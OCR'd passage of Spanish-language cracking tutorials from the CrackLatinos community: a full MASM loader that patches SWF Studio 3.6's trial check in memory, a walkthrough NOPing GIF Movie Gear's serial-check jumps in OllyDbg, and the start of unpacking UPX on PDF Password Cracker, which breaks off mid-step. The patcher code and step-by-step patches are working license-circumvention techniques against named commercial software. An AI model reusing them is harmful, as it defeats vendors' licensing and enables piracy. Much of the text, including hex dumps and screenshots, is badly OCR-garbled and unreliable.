en VB se parte para después armarla). Llegamos a lo siguiente: 
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loc_41FF99: ImpidCallI2 Unknown_415478() 
loc_41FF9E: BranchF loc _41FFD9 
loc _41FFA1: LargeBos loc _41FFD9S ' Ignore this 
loc_41FFA3: FMemLdR4 Me(104) 
loc_41FFA5: ImpidCallI2 Unknown_4232C0/() 
loc _41FFAD: F3tStr var_94 
loc 41FFBO: Litl2 Byte ¿HO 
| loc _41FFB2: LitStr "SUF Studio is running in TRIAL mode, this” 
loc_41FFB5: FLdZeroAd var_94 
loc _41FFBS: FS3tStrNoPop var_085 
loc_41FFBB: ConcatStr 
loc_41FFBC: F3tStrNoPop var_8C 
loc_41FFBF: LitStr "file will expire after one day" 
loc _41FFC2: ConcatStr 
loc_41FFC3: FSt3trNoPop var_90 
loc _41FFC6: LitStr "NARNING" 
loc _41FFC9: ImpidCallFPR4 Unknown 41FD30[() 


Si se fijan un poco más arriba, van a ver un BranchF loc_41FFD9 en la dirección loc_41FF9E. Este es como 
un JNE en ASM. O sea, salta si la condición NO es falsa. El valor que examina es el devuelto por la función 
anterior: loc_41FF99 ImpAdCalll2 Unknown_418478(). Ese ImpAdCalll2 YO lo traduzco a algo como: 
“Llamate a la función que está en 418478 y al resultado transformalo en Integer de 2 bytes” (el cual es 
compatible con el Boolean de VB 0). Ahora, hay que saber que en VB el valor FALSE (falso) se traduce 
como FF. O sea que cualquier valor DISTINTO de FF, NO es falso, es verdadero! O. 


Vamos a ver que hay en la función. Vamos a la dirección 418478: 


'Data Table: 4052E0 
loc_415846€C: Litl2 Byte <HFF 
loc _41846£: FStI2 var_08 
loc_418471: FLdl2 var_88 
loc_ 4158474: FStI2 var_56 
loc 418477: ExitProcl2 

End Sub 


Acá vemos el cuerpo de la función. Primero en 41846C PUSHea el valor false (FF. El £H significa que es un 
valor Hexadecimal) en una especie de stack (creo que trabaja así, no estoy seguro). Después carga unas 
variables con el valor pusheado. 

O sea, lo que sacamos claro de acá es que si podemos cambiar el valor FF a cualquier otro (por ejemplo 0), 
la función va a devolver siempre TRUE. Con esto el compile.exe va a pensar que el programa está 
registrado y nos va a generar un programa que no caduca nunca O. 


Ahora, cargamos en Olly el Compile.exe original, ttaceamos una vez con F7 hasta llegar al PUSHAD, 
usamos el script OEP_PUSHAD_POPAD y le damos 3 veces a F7 para llegar a nuestro OEP. De ahí, nos 


vamos a la dirección que nos da el VB Decompiler: en mi caso 41846C. 


Ahí vemos lo siguiente: 
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Recuerden que como está compilado en P-Code, lo que vemos son las instrucciones que recibe la 
msvbvm60.dl!l. Bien en 41846C vemos el byte F4 y en 41846D vemos nuestro FF. Osea que F4 debe ser el 
“opcode” de la instrucción Litl2_Byte! O. Ahora, modificarlo aquí no sirve de nada (el programa está 
empacado). Podríamos modificar el CompileDump_.exe pero eso no funciona porque el compile.exe utiliza 
cosas que tiene empacadas en MoleBox. Lo que podemos hacer es crear un cargador del programa que lo 
parchee en memoria. 


Abrimos WinAsm (o cualquier compilador de Masm) y cargamos el siguiente código: 


¿¡Parcheador de Memoria para Compile.exe de SWF Studio 3.6 build 147 
¿Por MCKSys Argentina 07/11/2008 
¿Gracias a Ricardo Narvaja por ser como es y a toda la lista de CrackLatinos por todo lo que me dieron 


.386 


.model flat, stdcall 
option casemap:none 


include 
include 
include 
include 


f 


E 
f 
E 


¿Amasm32XincludeYwindows.inc 
¿Amasm32Xincludelkernel32.inc 
:¿Amasm32Xincludeluser32.inc 
:¿Amasm32Xincludemasm32.inc 


includelib f:imasm32Xliblkernel32.lib 
includelib f:imasm3211libluser32.lib 
includelib f:imasm3211libimasm32.1lib 


include f:imasm32imacrosimacros.asm 


.data 


filename db "Compile.ext",0 ¡este es el nombre con que vamos a renombrar al Compile.exe ORIGINAL 
filename2 db "Compile.exe",0 ¡Nuestro nombre de archivo 

mensajel db "Imposible aplicar el parche!",0 

caption db "Parcheador de SWF Studio 3.6 Build 147",0 

parche db 4 dup (90h) 

struct1 db 100 dup(0),0Ah 

struct2 db 100 dup(0),0Bh 


tablal db 00h 


«data? 


hFile dd ? 
lSize dd ? 
CommandLine LPSTR ? 


. code 
start: 


Y 


obtenemos la línea de comando que nos manda Studio.exe 
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invoke GetCommandLine 


mov CommandLine,eax 


salto0: 


bucle: 


Y 


bucle2: 


Y 


errorl: 


salir: 


Y 


la correjimos la línea de comandos para ejecutar el archivo Compile.ext 
mov edi,eax 
Jjmp salto0 


inc edi 

cmp byte ptr[edi], 2eh 

jne salto0 

mov byte ptr[edi+3],74h 

cargamos la victima (compile.ext) 

invoke CreateProcess,0,dword ptr [CommandLine],0,0,0,4000200h,0,0,offset struct2,offset structl 


esperamos hasta que la aplicación se desempaque 

invoke ReadProcessMemory,dword ptr [struct1],4012cch,offset parche, 4h,0 

cmp dword ptr [parche],  40150468h 

jne bucle 

aplicamos el parche 

invoke WriteProcessMemory,dword ptr [struct1],41846dh,offset tablal,1,0 

cmp eax, O 

je errorl 

esperamos hasta que el proceso termine (esto es necesario porque sino falla el parche) 


invoke WaitForSingle0bject,dword ptr [struct1],0 
cmp eax, 102h 

je bucle2 

nos vamos! 

Jjmp salir 


invoke MessageBox,0,offset mensaje2,offset caption,MB_OK+MB_ICONERROR 
Jjmp salir 

Adiós 

invoke ExitProcess,0 


end start 


Bien, vemos que el código no es nada difícil de entender. Básicamente hacemos lo siguiente: 


1) 
2) 


Renombramos a mano el compile.exe original a compile.ext. 

Obtenemos la línea de comando que nos va dar Studio.exe (Studio.exe ejecuta a Compile.exe 
usando la API CreateProcess. Pero lo que va a ejecutar en realidad es NUESTRO compile.exe. Así 
podemos nosotros ejecutar el compile.exe original y parchearlo en memoria). 

Una vez que tenemos correjida la linea de comandos, utilizamos la API CreateProcess para cargar 
compile.ext. 

Esperamos hasta que se desempaque (acá uso un bucle que lo que hace es usar 
ReadProcessMemory para leer la dirección 4012CC. Si recuerdan 12CC es el OEP (en RVA) de 
nuestro programa. Y lo leido lo comparo con los bytes del OEP. Si son iguales, entonces ya termino 
de desempacar y puedo aplicar el parche con seguridad). 

Utilizo la API WriteProcessMemory para parchear la dirección 41846D (le pongo un 0) 

Por último, debo esperar hasta que el compile.ext termine su trabajo, porque si saliera luego de 
parchear, Studio.exe detectaría que SU compile ha terminado, y todavía no le ha dado el mensaje de 
que todo ha salido bien (el mensaje es el que sale en verde: BUILD SUCCESSFUL). Recuerden que 
Studio.exe ejecuta NUESTRO parcheador, y nosotros ejecutamos el compile.ext. 

Una vez que terminó todo, usamos ExitProcess para salir. 
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Bueno, yo usé assembler para crear el parcheador, pero ustedes pueden usar cualquier lenguaje de 
programación. Basta con que parcheen el byte de la función, todo debería funcionar. 


Luego, una vez que compilamos nuestro compile.exe, lo copiamos a la carpeta de SWF Studio. Cargamos 
nuestro proyecto de prueba, le damos a “BUILD” y.... 


SWF Studio Professional Edition 3.6 - PruebaCatalogo A sal Oj xj 
hb E _ HE _f/ m 9 5 % x= a q. 


New Open Save Build Options Tips Forums Update Store Unlock Help 


Output | Movie | window | Application | Screensaver | Defaults | Version | Expiry | Plugins | Files | Masks Build | Trace | 


Build Results 


adding application manifest 
application id (mutex] is "298B287B-F583-4312-9E84-6C96E2B774F1" 

setting script timeout to 15 seconds 

setting recursion depth to 256 calls 

setting splash screen timeout to 1 second(s] 

adding the ActionScript API 

core version: 8 

added E:*PruebaStudio+PruebaCatalogotcatalogol.swf 

added E:*PruebaStudio+PruebaCatalogo!splash2 jpg [compressed by 3%] 

added C:Srchivos de programa Northcode!Studio364 default. ico [compressed by 99%] 

adding plugins and files from layout 

added C:S4rchivos de programa Northcode!Studio36+Pluginstcatalog. dll (compressed by 53%] 

added E:*PruebaStudio+PruebaCatalogotcatalogol.txt [compressed by 13%] 

saving directory 

created E:*PruebaStudio+PruebaCatalogo'PruebaCatalogo.exe 

file version 1.0.0.0 

BUILD SUCCESSFUL pas 


Test Options DS 
[7 Automatically test the output file after a successful build 


Optional command line arguments for the projector 


AA — 


Test the output file Test... 


Test the screensaver settings dialog Settings... 


Je, je. No sale más el “WARNING”. 


Para ver que todo anda como debe, ejecutamos nuestro proyector recién creado, lo cerramos, adelantamos 
la fecha de la máquina unos días y ejecutamos nuevamente nuestro proyector. Si todo fue bien, la limitación 
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de un día habrá desaparecido. Sino, nos sale un símbolo se STOP con un oso blanco feo que nos dice que 
el período de prueba ha expirado Y 


Puffffffff, fue el primero y el más doloroso!!! Hacía mucho que no ejercitaba tanto los dedos! 

Bueno, para terminar: Acá pueden ver que no es necesario saber mucho de cracking para reventar 
programas. Lo que si hay que hacer es practicar mucho. Les recomiendo los tutoriales de la web de Ricardo 
porque son muy sencillos y tienen un excelente contenido. 

Para finalizar quiero agradecer principalmente a Ricardo Narvaja, por ser tan buen tipo y cracker, y también 
a todos los que están en CracksLatinos: Solid, Guan de Dio, Mintaka, Guillermo, Neutrino (imposible 
nombrar a todos), puesto que sin los tutoriales de ellos no podría haber escrito yo éste. 


Diviértanse mucho crackeando, que para eso estamos!!!! 


MCKSys Argentina (maccossattoOMyahoo.com.ar) 


CPACTESLATINTTS e PRACKINP TOTO 7 


140F7DE TES SB! 
. 
A 

SS 
A — 


a40F7E0|] . ES B7640: 


GIF MOVIE GEAR 
Programa para crear gifs. 


Antes que nada PERDÓN!!! Je! Viendo todos los tutos espectaculares de los listeros me 
da vergijenza escribir esto...pero bue como lei en un post viejo del grupo de google que 
Ricardo decía que lo que escribamos siempre le sirve a alguien...hací que bueno ahí 
voy. Espero esto le sirva a algún Newbie como yo... 


EMPEZANDO: 


El programa es full por 30 días, tenemos la opción de registrar buscando en “HELP- 
REGISTER NOW...” en el período trial pero transcurrido este aparece la siguiente nag: 


gamani 


GFIMOVIE GEAR Te 


The 30 day trial of GIF Movie Gear has expired. 


- To order a license for this software, choose Order. 
- If you have your license registration, choose Register. 


Y luego si pinchamos el botón “Register...” nos aparece una nueva ventana para 
ingresar un nombre y un serial: 


gamani 


GFPPMOVIE GEAR *e 


Thank you for purchasing GIF Movie Gearl 


Enter your registration information below to enable the 
software. Be sure to type it in exactly. 


Name: | 


Code: | 


(CJ 


Ingresando un serial cualquiera... 


Invalid Registration Info E 


A The information you have provided is invalid. Please be sure that you typed it exactly as it was given to you, 


El amigo RDG Packer detector nos da buenas noticia s(por lo menos para mí que soy un 
Newbie...): 


noir ACNE SELeCÍOr Vo coi -)x) 


C:Márchivos de programas GIF Movie Gearlmovgear.exe 
16) 


a) 
Microsoft Visual C++ v7.0 Compilador 


Nada Detectado 


Posible É. 
Contacto : Al Frente [] 


Drigen Lenguaje: U.S. Enalish * Inglés YY da "> Detectar 
O Archivo Escaneado en 025eg. O MA“ 030090930 57 


Lo cargamos en Olly y con Ctri+N (o click con el botón derecho del mouse 
y... SEARCH FOR/NAME (label) IN CURRENT MODULE) buscamos alguna Api 
conocida en la lista: 


Allí vemos la api GetWindowTextA que utilizada para ingresar texto, le ponemos un 
Breakpoint (BP) con F2 y con F9 comienza a correr el programa y en la nag inicial 
pinchamos en “Register...” y en la que sigue ingresamos un nombre y un serial 
cualquiera: 


 BÉMMOVEGEARI: 


Thank pou for purchasing GIF Movie Gearl 


Enter pour registration information below to enable the 
software. Be sure to type it in exactly. 


Name: | biohazard 


Code: 2929292929 


Olly para aquí, dentro de USER32: 


Si miramos el Stack: 


Balor224 CALL to from movgear. 0 


htind = 6656407? la ='"Edit”, ,parent= 


Hacemos click con el botón derecho en el Buffer y FOLLOW IN DUMP que por ahora 
esta haci: 


fiddress 


2. EA . a... . 


Con un EXECUTE TILL RETURN(Ctrl+P9) ejecutamos el codigo hasta el “Retn” que 
nos va a devolver al programa, si miramos el Stack en la misma posición que 
recién, vemos que ahora ingreso allí el nombre que pusimos en la ventana de registro: 


E EA ASCII 


Alaro 


0612 FSAd 25 FF 6. 


Parados en “Retn” con F8 o F7 volvemos a la siguiente instrucción a ejecutarse del 
módulo “movgear”: 


BO433CA6 
B0433CA9 
1B433CB0 
1BB433CB6 
00433CES 
1BB433CBC 
1B433CBD 
ts 


UB433CCS 
BO433CCB 


Case 1 of switch A 
R32.GetDlgltem>] | USER32.GetDlglte 
Count = 64 (100. y 


Buffer 
ControlID = 44F (1103. ) 
(rin 


GetDlgltem 

USER32. GetllindowTextA 
hlUnd 

GetlWindowTextA 


.... ++ ++ +. qn. 


Buffer 
[EA = 450 (1104.,) 


hlind 
GetDlgltem 


hlind 
GetWindowTextA 


Parados aquí veamos algo: nosotros volvemos en ese PUSH 64 y mas abajo hay dos 
CALL, la primera llama a GetDlgltem y la segunda es una llamada a la api 
GetWindowTextA y si miramos arriba de, PUSH 64 vemos que hay otro CALL a dicha 
api; es en esa en la que paro el Breakpoint que pusimos nosotros, y en ella se ingreso el 
nombre trucho en el Dump, entonces en esta segunda llamada a WindowGetTextA lo 
que va a hacer es ingresar nuestro serial trucho. Si entramos con F7 a “CALL EBX” 
volvemos a tener un buffer en el Stack y procediendo de igual manera que con el 
nombre trucho: 


En el Stack: 


Luego de hacer un EXECUTE TILL RETURN (Ctrl+P9): 


Address 


A -. 


-3: ¡+06 
di ¡+ob 


Con F8 volvemos al modulo”movgear” aqui: 


ADD ESP, 
erEriaaaOS 
, PTR SS: [ESP+10] 


LEA ECX, DWORD PTR SS: [ESP+10] 


PUSH OFO93F = KEY_ALL_ACCESS 
5, REG_OPTIONZNON_VOLATILE 


d 0 
key "sofruares iNGIFMovieGears2, 0” 
pres — HKEV-LOCAL_MÁCHINE 
132.RegCreateKeyEx pa A tejo 
PR. SS: [ESP+60] 
> 1 +1] 


ES 
: 
5 


se32Oz3bag 
2gpe Mos 

2338 

38 =88Z 


ly 
Al 
3 


132.RegSetValue ADVAPIS2.RegSetVa lueExA 


22 


EDX 

BufSize 
DWORO PTR SS: [ESP+10] 
DWORD PTR SS: [ESP+64] 


hKey y 


[CALL EST ] |[LRegSetVa lueExA 


Nosotros estamos en LEA EDX, DWORD PTR SS:[ESP+64] y más abajo vemos 
llamadas a apis que trabajan con el Registro de Windows, Si miramos la que está más 
abajo en la imagen vemos que crea un valor con el nombre “RegName3” y un poco más 
abajo tenemos algo similar pero hay un “RegCode”. Al principio de la imagen hay JE y 
más arriba una CALL., dentro de la cual “hace algo” de lo que después va a depender 
ese salto JE, si no salta guardara nuestros datos en el registro y supongo que los 
guardara solo si el serial ingresado es correcto. Podríamos probar si este es el salto 
clave; el JE verificara el estado del flag Z y si este vale 1 saltará y si vale O no lo hará. 


304424 10 LEA EAX, DWORD PTR SS: [ESP+10] 
PUSH_EAX 
LEA ECX, DWORD PTR SS: [ESP+10] 


PUSH as 

PUSH A 

PUSH A 

PUSH 

PUSH novaear. 0047F685 


ATA 


IOOOAAOS 


En la imagen de arriba estamos ya sobre el salto y si miramos bien vemos una línea roja 
que va hacia abajo; el color de la línea nos indica que el salto se tomará, igual Olly nos 
da esta información: 


El estado del flag Z es el siguiente: 


it BUFFFEFFFF) 
it OLFFFFFFFF) 
it BUFFFFFFFF) 
it BLFFFFFFFE) 
it ?FFDEGOBLFFF) 


s ] 
FFFFFFFF) 
FFFFFFFF) 
FFFFFFFF) 

: ?FFDEGOOLFFF) 


MFD De 
De al 


Ahí vemos que cambia el flag a O y ahora nuestro salto se ve haci: 


az 10 
Shaczs 10 — [LEA EE%,puoRD PTA SSstESP+101 dalSsobe=moVSear.0042208S 


Este cambio no es permanente, se realiza en memoria, es para ver si este salto es el 
correcto. Pongamos un Breakpoint (F2) ya que si es nuestro salto deberemos volver 
aquí. Demos Run (F9) y veamos que pasa: 


ES GIF Movie Gear 


File Edit Frame Animation View Help 


pa [El A Contents... Fi 2 


Tutorial... 


About GIF Movie Gear... 


q 
2 Tart' 
OU Otal t: 


Open an existing file (animation or image) by using 
File > Open or File > Import or select a recently opened 
file from the File menu. 


=> Open File 


Insert new frame(s) to build a new animation by using 
File > Insert Frames or by drag £ dropping image files 
directly into the workspace. 


8 Insert Frames 


Viewthe Tutorial to learn howto use GIF Movie Gear. 


2 Tutorial 


EL programa corre y en HELP ya no aparece la opción REGISTER NOW... 

Sin duda este es nuestro salto! Carguemos de nuevo el programa (Alt + F2). 

Bien ahora pensemos como parcharlo. Podriamos cambiar ese JE por un JNE para que 
cuando el flag Z vale 1 NO salte. Inicialmente pensé que esto funcionaría y de hecho 
funciona, pero en este caso tiene 2 contras: hay que poner el número de registro (jeje 
una re vagancia) y al final sale una nag diciendo “THIS TRIAL SOFTWARE EXPIRES 
IN -1 DAYS”. 


gamani 


GFPNOVIE GEAR *e 


Wersion 4.2.1 


This Trial Software expires in -1 days. 


Online: http:/'www.moviegear.com 


Copyright (c) 1996-2009 gamani productions 
Movie Gearis a trademark of gamani productions 
GIF is a service mark of CompuServe Inc. 


[O 


A ver si recordamos encima del salto había un CALL. Una llamada arriba de un salto 
clave me dice que en esa CALL se debe generar el serial y en base a ello el JE se 
produce o no. Situemonos sobre “CALL movgear.004338E0” y entremos con F7 a ver 
qué pasa. Una vez dentro vemos algo hací: 


Puse algunos comentarios para que vean lo que hace. Todos esos JNZ me llevan a la 
zona de chico malo (zona donde se genera el MessageBoxA que me dice que es un 
serial inválido).Si quisiéramos buscar un serial ya tendríamos como dato que los 
primeros caracteres tendrían que ser “mg37”; pero como todavía soy un poco Newbie y 
ando flojo en buscar seriales lo voy a parchar. Podríamos invertir todos los saltos con JZ 
pero preferiría “nopear”, no sea cosa que a alguien se le ocurra poner m337 como 
primeros números de su serial trucho...jeje...obviamente saltaría a chico malo. Por 
ahora anótense estos saltos MALOS en algún lado o pongan BP en ellos para no 
olvidarse. 

Continuemos y veamos si hay más saltos que nos envíen a la zona de serial inválido: 


Aquí hay un bucle....trabajará con el serial en ellos, veo unos saltos pero ninguno me 
lleva a chico malo. Pongo un BP en el CMP a la salida del bucle y doy RUN. 


Ahora vemos un salto y una llamada, las pasamos con F8 y no pasa nada. Pongamos un 
BP en ese CMP ESI, EAX a la salida de este otro bucle: 


Ese JNZ es el último y si lo pasamos unas instrucciones más abajo viene un RETN, que 
nos devolverá un poquito más arriba del JE que parchamos al principio y no funcionó. 
Una vez en el cambiemos el estado del flag Z y veamos si pasando este salto ya estaría 
todo bien. Recuerdan como cambiar el flag, no? Esta más arriba. 

Vemos que ahora el salto no se tomará: 


Anoten este salto por las dudas y apretemos F9 a ver si ya esta!!! 

El programa corre y en el HELP no aparece más el “REGISTER NOW...”. 

Jeje funcionó. Ahora modifiquemos y guardemos los cambios al ejecutable. Primero 
busquemos todos esos JNZ que estaban juntos y los seleccionamos y hacemos click con 
el botón derecho y en el menú contextual que se abre elegimos: BINARY/FILL WITH 
NOPs. : 


Backup 
Copy > 


Binary » Edit Ctri+E 
201 R EBX, ill with 00' 
SBBB FSF34891 MOV EDI, DWORD PTR DS: [EBX+48F3F8] Assemble Space Fill with 00's 
BBC? Label ; Fill with NOPs 


HO 
LEA EDX, DWORD PTR DS: [EAX+1] 
LEA, EC; DUORD PTR, DS: LECÁS Edit comment ; 


E PTR DS: [EAXJ Binary copy 


Breakpoint » s 
Hit trace » inary paste 
Run trace > 


MOU ECX,EAX 
MAU FST.FRP 


Ahora vamos a el último salto que nos llevaba a chico malo y también lo nopeamos de 
la misma manera. Una vez hecho esto clickeamos con el botón derecho y en el menú 
contextual buscamos lo siguiente: 


Search for > 

Find references to » 

View » 

Copy to executable » Selection 
Analysis » All modificatioms 


Copy selection to executable file 


Copy selection to executable file? 


Copy all | Skip | Cancel 


Acá le damos a “Copy all” 


Se nos abre una nueva ventana y vovlemos a hacer click con el botón derecho y ahora 
elegimos SAVE FILE. 


Backup » 
Copy > 
Binary » 
Assemble 

Search for » 
Save file 

Go to offset Ctri+G 


Guardamos el archivo con otro nombre en el mismo directorio o en otro lado. Con este 
no hay problema en guardarlo en otro lado pero otros deben estar si o si en el directorio 
de instalación del programa. Bueno buscando y ejecutando ven que ya esta registrado y 
la molesta nag del final ya no aparece. DERROTADO. 

Bueno este tute está orientado a muy Newbies y espero que les sirva. 

De a poquito y mientras más vaya aprendiendo voy a tratar de devolver a la lista todo lo 
que me va dando haciendo algunos tutes. Saludos a Ricardo, no te conozco pero te estoy 
agradecido por el curso de “Cracking con Olly DBG desde 0”. 

.«:. BhZd .:. 


CRAFCKFEALAS TIMO" 12 CPAP 1501505515051 


Lo primero que hago es mirar con que está protegido: 
PE PEID v0.94 


File: C: Archivos de programalPDF Password Cracker v3.Olcrac [pza 
Entrypoint; ODOCCODO EP Section: > | 
File Offset: 00049400 First Bytes: —60,BE,00,30 


Linker Info: 6.0 Subsystem: —Yin32 GUI 


UPX 0.89.6 - 1,02 / 1,05 - 1.24 -> Markus 8: Laszlo 


Multi Scan Task Viewer Extra Info | => | 
[Y Stay on top Options About Exit 


RDGiPacker Detector vO.6.5 -)x) 


CA4rchivos de programa PDF Password Cracker v3.0 crackpdf ex 


Compilador 
UPX v0.89.6 - v1.02 / v1.05 - v1.25 Detectado 


UPX Detección Heurística da 
Al Frente [] 


AE 
e Archivo Escaneado en 03Seg. O ¡O MB hi 2/3/4/5/6/7 /8 JM | 


Contacto : 


RDGiPacker Detector vO.6.5 -)x) 


Ci4rchivos de programalPDF Password Cracker v3.D1crack, M7 Abrir | 


Compilador 
UPX v1.95 Beta - 2.00W Detectado 
UPX Detección Heurística a 


Contacto : Www.upx.sourceforge.net Al Frente [] 


EDO 
e Archivo Escaneado en 7,17 5eg. O MA “€ MB [ hi 2/3/4/s/6/7/a 1] 


Vemos que ambos coinciden aunque en el modo M-B el RDG me dice que es otra versión pero parece que está 


claro que es UPX. 
Abrimos el programa en olly y lo arrancamos con F9 y nos saldrá una ventana para registrarnos: 


Please register PDF Password Cracker v3.0 


Metamos un serial cualquiera y probemos a ver si acertamos: 


esl 


Sy Your registration key is wrong, please double check it and try again. 


Lo normal, si hubiera acertado sería prácticamente milagroso jajaja. Bueno, por lo menos nos muestra una ventanita 
de chico malo así que atacaré por ahí. Así que vayamos hasta el OEP y dumpeemos y reparemos la IAT para que 


corra. 


Lo primero será llegar al OEP así que reiniciamos la aplicación en olly y aparecemos aquí: 


004CC000 
004CC001 
004CC006 
0N4CccoOe 
004CC00D 
004CCO010 
004CC012 
004CC013 
004CC014 
004CC015 
004CCO16 
004CCco17 


60 


BE 00304800 
8DBE 0O0E0F7FF 
57 

83CD FF 

EB 10 

90 

90 

90 

90 

90 

90 


esi, 183000 
lea edi, ds: [esi+FFF7E000] 
push edi 
or ebp, FFFFFFFF 
jmp short 004CC022 
nop 
nop 
nop 
nop 
nop 
nop 


Pulsamos F7 para pasar el PUSHAD y ahora nos vamos a la Pila para ver donde introdujo el último valor de 


registro: 


Pe 


La 


IO 
po pl fp fl. a o a al a o a Jr uu a 


= 
a 


IDO 


= 
a 


on Lion 


DOS 


a 
Y 
y 
5 
a 
a 
a 
a 
A 
P 
O 
' 

a 
1%] 
a 
A 
6) 
15] 
B 
a 
g 


Ma Da a a a a a a a JU A a a a a A A A A | 


DICO LO III OO IO LODO LO 


- 

Ol 
- 

O 


7) 
) 


DO 
e a 
7) 


CHOCO TU 
COL ArÓ Tirar 
pr 
SLDAG 


- 

MO 
O 
“y 


MOSICOY THAI TU 


A 


A. 
OO TÍ 


MN 


Dow TAN TT 


o hd Leti Jas Y 


- 
a 


¿O TH 


ANO 
y 


DJS TICO 


crack 
RETURN 67 


End of SEH chain 
SE handler___ 
kerne 132. 703817070 


Vemos que el último que añadió esta en 0013FFA4 así que vayamos a esa dirección en el Dump y pongamos un 


HBP en él: 


| Backup 


A Copy 

Binary 
004CCO06| SDBE OUEO Coro . 

AA | 

004CCO0C 57 arco o | 
O04CCOOD| 83CD FF 1 in Dump 
004CCO10|, EB 10 Goto > 
004CCc012 90 pra ; 
004CC013| 90 jas ' 
004Ccco1a4| 90 lo ) 
00ACCo015| 90 

k » 
D0ACCo16| 90 Ss 
D04CCo17| 90 tea 
p04cco18!| 8A06 somble 
DOACCO1A| 46 | Special 
DO4CCOD1IB rm 
esi=FFF Extra 

Export table 

Appearance 


0013FFA4 | 
0013FFB4|00 FO FD 
0013EFCA| 67 70 81 
0013FFD4|7D 4C 54 
0013FFE4|C0 9A 83 
0013FFF4|00 00 00 


7F F4 E4 91 7C 00 CO ac 
70 08 02 92 7C FF FF FF 
80 C8 FF 13 00 10 3D 4E 
30 70 70 81 7C 00 00 00 


00 5A 51 14 00 00 00 00 00 


Ahora damos a F9 y vemos que para en: 


o0a4ccia7Í 
DO4CC1AB| 


004CC1AD 3904 cmp esp, eax 
ODACCIAF|” 75 FA jnz short 004CC1AB 
004CC1B1 83EC 80 sub esp, -80 

- E9 5494F9FF jmp 0046560D 
004CC1B9 0000 add ds: [eax], al 
004CC1BB 0000 add ds: [eax], al 
004CC1BD 0000 add ds: [eax], al 
004CC1BF 0000 add ds: [eax], al 
004CcciC1 0000 add ds: [eax], al 
004CCc1C3 0000 add ds: [eax], al 


Pues pongamos un BP en el JMP como se ve en la imagen y demos a F9 y cuando pare en el BP damos a F7 para 
pasarlo y llegamos aquí: 


[address [Hex dump  [Disassembly 


0046560D 55 push ebp 


mov ebp, esp 
| push -1 
00465612| 68 E8BC4800 push 48BCE8 


00465617| 68 4C9D4600 push 469DAC SE handler installation 
00465610. 64:A1 00000000 mov eax, fs: [0] 
00465622 | 50 push eax 

00465623. 64:8925 000000 mov fs:[0], esp 
0046562A 83EC 58 sub esp, 58 
0046562D| 53 push ebx 

0046562E| 56 push esi 

0046562F | 57 push edi 

00465630 8965 E8 mov ss: [ebp-18], esp 
00465633| FF15 38824800 ¡call ds: [488238] kernel32.GetVersion 
00465639 | 33D2 xor edx, edx 
0046563B| 8AD4 mov dl, ah 


Esto tiene toda la pinta de ser un OEP correcto así que lo doy por bueno y seguimos. Ahora lo siguiente es 
dumpearlo y para eso usamos por ejemplo OllyDump. 


OllyDump - crackpdf.exe 


Start Address: [400000 Size: [CFODO 
Entry Point: jecooo > Modify: [65600 Get ElP as DEP | Cancel | 


Base of Code: [eao00 Base of Data: [coo0o 


[Y Fix Raw Size €: Offset of Dump Image 


| Section [ Virtual Size_ | Virtual Offset | Fiaw Size__ | Piaw Offset 


00082000 00001000 00082000 00001000 E0000080 
00048000 00083000 00048000 00083000 E0000040 
STO 00002000 o00cDo0o 00002000 o00CDo000. — CODDOD4O 


[— Rebuild Import 


(* Methodl : Search JMP[API] | CALL[API] in memory image 
C Method2 : Search DLL €: 4PI name string in dumped file 


Ahora toca reparar la IAT y para ello necesitamos saber donde empieza y donde acaba esta. Para localizar la IAT 
nos colocamos encima de la siguiente CALL, ya que vemos que apunta a una API, y hacemos lo siguiente: 


Assemble Space 


Search for 

Find references to 
View 

Copy to executable 
Analysis 

Detach Process 


Y PY Y Y» 


Process Patcher 
Analyze This! 


Asm2Clipboard 
Bookmark 

Bookmark 

Run Script 

Dump debugged process 
Make dump of process 
Ultra String Reference » 


Appearance , 


A A A 


Aparecemos aquí: 


00488238|6A 12 81 7C 
00488248 
00488258 
00488268 


00488278 
00488288 
00488298 
00488248 
004882B8 


Subimos hasta encontrar el principio de la IAT y lo encontramos en 00487FFC: 


00487FE8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00487FF8|00 00 00 00 00 00 00 00 5D BB DC 77 42 78 DA 77 
00488008 /AB 7A DA 77 E4 E9 DA 77 D7 EA DA 77 D5 EC DA 77 
00488018/80 42 DB 77 17 6C DA 77 00 00 00 00 F4 C7 C3 58 
00488028 CF 65 C3 58 D8 03 C4 58 05 02 C4 58 00 00 00 00 
00488038 AE 3A FO 77 OE D3 F1 77 05 3A FO 77 EF D3 F1 77 
00488048|56 6A EF 77 FA 6B EF 77 06 C0 EF 77 F1 7C EF 77| 
00488058|79 7C EF 77 A5 61 EF 77 37 65 F2 77 1B 82 EF 77 
00488068|3F BA EF 77 EA D3 EF 77 7C 77 FO 77 9B 86 EF 77 


00488558|7A 97 3A TE 9E B2 3A 7E 89 C6 3B 7E B2 DE 3A 7E 
00438568/56 AF 3A 7E 00 00 00 00 40 4D F8 72 5F 66 F9 72 
00488578/57 37 F9 72 00 00 00 00 10 7C 37 76 9F 30 36 76 
00488588 |63 25 36 76 00 00 00 00 AC 00 50 77 EA F6 4C 77 


00488598|60 DO 4C 77 44 DO 4C 77 2A 56 51 77 5A 57 51 77 


004885A8| 1D C8 5A 77 C5 56 4E 77 B6 FC 4F 77 F2 87 4E 77 
004885B8/1F 5F 52 77 F3 A2 4F 77 71 AB 54 77 C1 A9 54 77 
00488508 /E7 31 50 77 00 00 00 00 6A 09 1F 7E 00 00 00 00 


004885D8/00 00 00 00 00 00 00 00 08 97 48 00 E8 85 48 00 


Final TAT - Inicio IAT = Tamaño IAT 
Tamaño IAT = 004885D8 - 00487FFC = 5DC 


Bueno pues con estos valores y el OEP ya podemos intentar reparar la IAT así que abrimos Import Rec y 
seleccionamos a la víctima en la lista de procesos: 


$ Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


Attach to an Áctive Process 


c:1archivos de programatpdf password cracker v3.0 crackpdf. exe [OODODEF8] v | Pick DLL 


Imported Functions Found 


: 


Show Invalid 


Show Suspect 


Clear Imports 


Module loaded: c:windows!system324userenw. dll 
Module loaded: c:4windows!system324netapi32. dll 
Module loaded: c:windows!system32Arsaenh. dll Clear Log 
Getting associated modules done. 

Image Base:00400000 Size: ODOCFODO 

Original 14,7 RWA found at: 00088238 in Section AW4;: 00083000 Size:00044000 


147 Infos needed New Import Infos (1ID+45CIl+LOADER] — 


DEP [00065600 IT Adosearch: RAYA [00000000 Size [00000000 
Ava, [00087FFC Size [000005DC [Y Add new section 


Load Tree | Save Tree | Get Imports l Fix Dump [ 


Fer E fadl 


Como veis ya tiene puesto los valores necesarios que son el OEP (menos la ImageBase, el RVA (es el inicio de la 
